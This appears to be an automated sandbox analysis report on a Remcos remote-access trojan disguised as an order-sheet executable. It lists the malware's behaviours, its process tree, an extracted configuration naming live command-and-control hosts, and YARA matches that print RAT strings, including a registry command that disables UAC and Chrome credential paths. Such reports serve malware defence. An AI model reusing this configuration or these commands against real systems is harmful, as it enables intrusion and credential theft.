Play interactive tour

Edit tour

Windows Analysis Report RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Overview

General Information

Sample Name:	RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe
Analysis ID:	479213
MD5:	06534c059b111776b838f793c6444622
SHA1:	7ebda7124a60de107a00960d9fe0563fd3cd2760
SHA256:	933a4d2abfdf0f91550a102808d00adace6eb9df89ea9e254e2df7601b02dd8f
Infos:
Most interesting Screenshot:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Detected Remcos RAT

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to inject code into remote processes

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to simulate mouse events

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe (PID: 5256 cmdline: 'C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe' MD5: 06534C059B111776B838F793C6444622)

mobsync.exe (PID: 4692 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)

Cshgvzx.exe (PID: 5384 cmdline: 'C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe' MD5: 06534C059B111776B838F793C6444622)

dialer.exe (PID: 6544 cmdline: C:\Windows\System32\dialer.exe MD5: F176211F7372248224D02AC023573870)

Cshgvzx.exe (PID: 5296 cmdline: 'C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe' MD5: 06534C059B111776B838F793C6444622)

secinit.exe (PID: 6672 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)

cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "204.44.86.179:49151:0123qwegus.duckdns.org:49151:0", "Assigned name": "septttt", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-ZXIQGD", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\xzvghsC.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000002.331608026.0000000002F98000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606bc:$str_a1: C:\Windows\System32\cmd.exe 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f86c:$str_b2: Executing file: 0x60800:$str_b3: GetDirectListeningPort 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x603d4:$str_b5: licence_code.txt 0x60278:$str_b7: \update.vbs 0x5f8dc:$str_b9: Downloaded file: 0x5f8a8:$str_b10: Downloading file: 0x5f890:$str_b12: Failed to upload file: 0x607c8:$str_b13: StartForward 0x607e8:$str_b14: StopForward 0x60220:$str_b15: fso.DeleteFile " 0x601b4:$str_b16: On Error Resume Next 0x60250:$str_b17: fso.DeleteFolder " 0x5f880:$str_b18: Uploaded file: 0x5f91c:$str_b19: Unable to delete: 0x601e8:$str_b20: while fso.FileExists("
00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60553:$str_a1: C:\Windows\System32\cmd.exe 0x604cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x604cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5facf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60127:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f703:$str_b2: Executing file: 0x60697:$str_b3: GetDirectListeningPort 0x5fee7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6026b:$str_b5: licence_code.txt 0x6010f:$str_b7: \update.vbs 0x5f773:$str_b9: Downloaded file: 0x5f73f:$str_b10: Downloading file: 0x5f727:$str_b12: Failed to upload file: 0x6065f:$str_b13: StartForward 0x6067f:$str_b14: StopForward 0x600b7:$str_b15: fso.DeleteFile " 0x6004b:$str_b16: On Error Resume Next 0x600e7:$str_b17: fso.DeleteFolder " 0x5f717:$str_b18: Uploaded file: 0x5f7b3:$str_b19: Unable to delete: 0x6007f:$str_b20: while fso.FileExists("
00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606bc:$str_a1: C:\Windows\System32\cmd.exe 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f86c:$str_b2: Executing file: 0x60800:$str_b3: GetDirectListeningPort 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x603d4:$str_b5: licence_code.txt 0x60278:$str_b7: \update.vbs 0x5f8dc:$str_b9: Downloaded file: 0x5f8a8:$str_b10: Downloading file: 0x5f890:$str_b12: Failed to upload file: 0x607c8:$str_b13: StartForward 0x607e8:$str_b14: StopForward 0x60220:$str_b15: fso.DeleteFile " 0x601b4:$str_b16: On Error Resume Next 0x60250:$str_b17: fso.DeleteFolder " 0x5f880:$str_b18: Uploaded file: 0x5f91c:$str_b19: Unable to delete: 0x601e8:$str_b20: while fso.FileExists("
00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606bc:$str_a1: C:\Windows\System32\cmd.exe 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f86c:$str_b2: Executing file: 0x60800:$str_b3: GetDirectListeningPort 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x603d4:$str_b5: licence_code.txt 0x60278:$str_b7: \update.vbs 0x5f8dc:$str_b9: Downloaded file: 0x5f8a8:$str_b10: Downloading file: 0x5f890:$str_b12: Failed to upload file: 0x607c8:$str_b13: StartForward 0x607e8:$str_b14: StopForward 0x60220:$str_b15: fso.DeleteFile " 0x601b4:$str_b16: On Error Resume Next 0x60250:$str_b17: fso.DeleteFolder " 0x5f880:$str_b18: Uploaded file: 0x5f91c:$str_b19: Unable to delete: 0x601e8:$str_b20: while fso.FileExists("
00000013.00000002.356879289.00000000006E8000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60553:$str_a1: C:\Windows\System32\cmd.exe 0x604cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x604cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5facf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60127:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f703:$str_b2: Executing file: 0x60697:$str_b3: GetDirectListeningPort 0x5fee7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6026b:$str_b5: licence_code.txt 0x6010f:$str_b7: \update.vbs 0x5f773:$str_b9: Downloaded file: 0x5f73f:$str_b10: Downloading file: 0x5f727:$str_b12: Failed to upload file: 0x6065f:$str_b13: StartForward 0x6067f:$str_b14: StopForward 0x600b7:$str_b15: fso.DeleteFile " 0x6004b:$str_b16: On Error Resume Next 0x600e7:$str_b17: fso.DeleteFolder " 0x5f717:$str_b18: Uploaded file: 0x5f7b3:$str_b19: Unable to delete: 0x6007f:$str_b20: while fso.FileExists("
00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60553:$str_a1: C:\Windows\System32\cmd.exe 0x604cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x604cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5facf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60127:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f703:$str_b2: Executing file: 0x60697:$str_b3: GetDirectListeningPort 0x5fee7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6026b:$str_b5: licence_code.txt 0x6010f:$str_b7: \update.vbs 0x5f773:$str_b9: Downloaded file: 0x5f73f:$str_b10: Downloading file: 0x5f727:$str_b12: Failed to upload file: 0x6065f:$str_b13: StartForward 0x6067f:$str_b14: StopForward 0x600b7:$str_b15: fso.DeleteFile " 0x6004b:$str_b16: On Error Resume Next 0x600e7:$str_b17: fso.DeleteFolder " 0x5f717:$str_b18: Uploaded file: 0x5f7b3:$str_b19: Unable to delete: 0x6007f:$str_b20: while fso.FileExists("
Process Memory Space: mobsync.exe PID: 4692	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: dialer.exe PID: 6544	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: secinit.exe PID: 6672	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.mobsync.exe.10590000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.mobsync.exe.10590000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60553:$str_a1: C:\Windows\System32\cmd.exe 0x604cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x604cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5facf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60127:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f703:$str_b2: Executing file: 0x60697:$str_b3: GetDirectListeningPort 0x5fee7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6026b:$str_b5: licence_code.txt 0x6010f:$str_b7: \update.vbs 0x5f773:$str_b9: Downloaded file: 0x5f73f:$str_b10: Downloading file: 0x5f727:$str_b12: Failed to upload file: 0x6065f:$str_b13: StartForward 0x6067f:$str_b14: StopForward 0x600b7:$str_b15: fso.DeleteFile " 0x6004b:$str_b16: On Error Resume Next 0x600e7:$str_b17: fso.DeleteFolder " 0x5f717:$str_b18: Uploaded file: 0x5f7b3:$str_b19: Unable to delete: 0x6007f:$str_b20: while fso.FileExists("
18.2.dialer.exe.10590000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.dialer.exe.10590000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f953:$str_a1: C:\Windows\System32\cmd.exe 0x5f8cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f8cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5eecf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f527:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5eb03:$str_b2: Executing file: 0x5fa97:$str_b3: GetDirectListeningPort 0x5f2e7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f66b:$str_b5: licence_code.txt 0x5f50f:$str_b7: \update.vbs 0x5eb73:$str_b9: Downloaded file: 0x5eb3f:$str_b10: Downloading file: 0x5eb27:$str_b12: Failed to upload file: 0x5fa5f:$str_b13: StartForward 0x5fa7f:$str_b14: StopForward 0x5f4b7:$str_b15: fso.DeleteFile " 0x5f44b:$str_b16: On Error Resume Next 0x5f4e7:$str_b17: fso.DeleteFolder " 0x5eb17:$str_b18: Uploaded file: 0x5ebb3:$str_b19: Unable to delete: 0x5f47f:$str_b20: while fso.FileExists("
8.2.mobsync.exe.10590000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.mobsync.exe.10590000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f953:$str_a1: C:\Windows\System32\cmd.exe 0x5f8cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f8cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5eecf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f527:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5eb03:$str_b2: Executing file: 0x5fa97:$str_b3: GetDirectListeningPort 0x5f2e7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f66b:$str_b5: licence_code.txt 0x5f50f:$str_b7: \update.vbs 0x5eb73:$str_b9: Downloaded file: 0x5eb3f:$str_b10: Downloading file: 0x5eb27:$str_b12: Failed to upload file: 0x5fa5f:$str_b13: StartForward 0x5fa7f:$str_b14: StopForward 0x5f4b7:$str_b15: fso.DeleteFile " 0x5f44b:$str_b16: On Error Resume Next 0x5f4e7:$str_b17: fso.DeleteFolder " 0x5eb17:$str_b18: Uploaded file: 0x5ebb3:$str_b19: Unable to delete: 0x5f47f:$str_b20: while fso.FileExists("
8.2.mobsync.exe.10591897.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.mobsync.exe.10591897.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ecbc:$str_a1: C:\Windows\System32\cmd.exe 0x5ec38:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e238:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e890:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5de6c:$str_b2: Executing file: 0x5ee00:$str_b3: GetDirectListeningPort 0x5e650:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e9d4:$str_b5: licence_code.txt 0x5e878:$str_b7: \update.vbs 0x5dedc:$str_b9: Downloaded file: 0x5dea8:$str_b10: Downloading file: 0x5de90:$str_b12: Failed to upload file: 0x5edc8:$str_b13: StartForward 0x5ede8:$str_b14: StopForward 0x5e820:$str_b15: fso.DeleteFile " 0x5e7b4:$str_b16: On Error Resume Next 0x5e850:$str_b17: fso.DeleteFolder " 0x5de80:$str_b18: Uploaded file: 0x5df1c:$str_b19: Unable to delete: 0x5e7e8:$str_b20: while fso.FileExists("
19.2.secinit.exe.10590000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.secinit.exe.10590000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60553:$str_a1: C:\Windows\System32\cmd.exe 0x604cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x604cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5facf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60127:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f703:$str_b2: Executing file: 0x60697:$str_b3: GetDirectListeningPort 0x5fee7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6026b:$str_b5: licence_code.txt 0x6010f:$str_b7: \update.vbs 0x5f773:$str_b9: Downloaded file: 0x5f73f:$str_b10: Downloading file: 0x5f727:$str_b12: Failed to upload file: 0x6065f:$str_b13: StartForward 0x6067f:$str_b14: StopForward 0x600b7:$str_b15: fso.DeleteFile " 0x6004b:$str_b16: On Error Resume Next 0x600e7:$str_b17: fso.DeleteFolder " 0x5f717:$str_b18: Uploaded file: 0x5f7b3:$str_b19: Unable to delete: 0x6007f:$str_b20: while fso.FileExists("
19.2.secinit.exe.500000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.secinit.exe.500000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606bc:$str_a1: C:\Windows\System32\cmd.exe 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f86c:$str_b2: Executing file: 0x60800:$str_b3: GetDirectListeningPort 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x603d4:$str_b5: licence_code.txt 0x60278:$str_b7: \update.vbs 0x5f8dc:$str_b9: Downloaded file: 0x5f8a8:$str_b10: Downloading file: 0x5f890:$str_b12: Failed to upload file: 0x607c8:$str_b13: StartForward 0x607e8:$str_b14: StopForward 0x60220:$str_b15: fso.DeleteFile " 0x601b4:$str_b16: On Error Resume Next 0x60250:$str_b17: fso.DeleteFolder " 0x5f880:$str_b18: Uploaded file: 0x5f91c:$str_b19: Unable to delete: 0x601e8:$str_b20: while fso.FileExists("
19.2.secinit.exe.10591897.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.secinit.exe.10591897.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ecbc:$str_a1: C:\Windows\System32\cmd.exe 0x5ec38:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e238:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e890:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5de6c:$str_b2: Executing file: 0x5ee00:$str_b3: GetDirectListeningPort 0x5e650:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e9d4:$str_b5: licence_code.txt 0x5e878:$str_b7: \update.vbs 0x5dedc:$str_b9: Downloaded file: 0x5dea8:$str_b10: Downloading file: 0x5de90:$str_b12: Failed to upload file: 0x5edc8:$str_b13: StartForward 0x5ede8:$str_b14: StopForward 0x5e820:$str_b15: fso.DeleteFile " 0x5e7b4:$str_b16: On Error Resume Next 0x5e850:$str_b17: fso.DeleteFolder " 0x5de80:$str_b18: Uploaded file: 0x5df1c:$str_b19: Unable to delete: 0x5e7e8:$str_b20: while fso.FileExists("
19.2.secinit.exe.10591897.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.secinit.exe.10591897.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5c46c:$str_b2: Executing file: 0x5d400:$str_b3: GetDirectListeningPort 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5cfd4:$str_b5: licence_code.txt 0x5ce78:$str_b7: \update.vbs 0x5c4dc:$str_b9: Downloaded file: 0x5c4a8:$str_b10: Downloading file: 0x5c490:$str_b12: Failed to upload file: 0x5d3c8:$str_b13: StartForward 0x5d3e8:$str_b14: StopForward 0x5ce20:$str_b15: fso.DeleteFile " 0x5cdb4:$str_b16: On Error Resume Next 0x5ce50:$str_b17: fso.DeleteFolder " 0x5c480:$str_b18: Uploaded file: 0x5c51c:$str_b19: Unable to delete: 0x5cde8:$str_b20: while fso.FileExists("
8.2.mobsync.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.mobsync.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ecbc:$str_a1: C:\Windows\System32\cmd.exe 0x5ec38:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e238:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e890:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5de6c:$str_b2: Executing file: 0x5ee00:$str_b3: GetDirectListeningPort 0x5e650:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e9d4:$str_b5: licence_code.txt 0x5e878:$str_b7: \update.vbs 0x5dedc:$str_b9: Downloaded file: 0x5dea8:$str_b10: Downloading file: 0x5de90:$str_b12: Failed to upload file: 0x5edc8:$str_b13: StartForward 0x5ede8:$str_b14: StopForward 0x5e820:$str_b15: fso.DeleteFile " 0x5e7b4:$str_b16: On Error Resume Next 0x5e850:$str_b17: fso.DeleteFolder " 0x5de80:$str_b18: Uploaded file: 0x5df1c:$str_b19: Unable to delete: 0x5e7e8:$str_b20: while fso.FileExists("
19.2.secinit.exe.500000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.secinit.exe.500000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ecbc:$str_a1: C:\Windows\System32\cmd.exe 0x5ec38:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e238:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e890:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5de6c:$str_b2: Executing file: 0x5ee00:$str_b3: GetDirectListeningPort 0x5e650:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e9d4:$str_b5: licence_code.txt 0x5e878:$str_b7: \update.vbs 0x5dedc:$str_b9: Downloaded file: 0x5dea8:$str_b10: Downloading file: 0x5de90:$str_b12: Failed to upload file: 0x5edc8:$str_b13: StartForward 0x5ede8:$str_b14: StopForward 0x5e820:$str_b15: fso.DeleteFile " 0x5e7b4:$str_b16: On Error Resume Next 0x5e850:$str_b17: fso.DeleteFolder " 0x5de80:$str_b18: Uploaded file: 0x5df1c:$str_b19: Unable to delete: 0x5e7e8:$str_b20: while fso.FileExists("
8.2.mobsync.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
